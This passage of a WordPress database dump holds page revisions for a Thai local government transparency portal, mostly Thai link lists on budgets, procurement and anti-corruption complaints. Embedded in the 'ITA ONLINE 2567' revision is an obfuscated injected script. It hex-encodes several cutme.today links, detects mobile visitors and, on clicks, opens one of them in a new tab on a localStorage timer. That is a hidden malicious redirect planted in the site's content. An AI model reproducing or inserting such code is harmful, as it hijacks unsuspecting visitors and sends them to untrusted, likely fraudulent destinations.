data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-20 08:54:33','2024-08-20 01:54:33','',871,'http://pakhaeng.ssk.in.th/?p=889',0,'revision','',0),
(890,1,'2024-08-20 09:08:10','2024-08-20 02:08:10','','Is It a Gift Instagram Post','','inherit','','closed','','is-it-a-gift-instagram-post-2','','','2024-08-20 09:08:10','2024-08-20 02:08:10','',871,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-1.png',0,'attachment','image/png',0),
(892,1,'2024-08-20 09:11:01','2024-08-20 02:11:01','','Is It a Gift Instagram Post','','inherit','','closed','','is-it-a-gift-instagram-post-3','','','2024-08-20 09:11:01','2024-08-20 02:11:01','',871,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png',0,'attachment','image/png',0),
(893,1,'2024-08-20 09:11:06','2024-08-20 02:11:06','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- 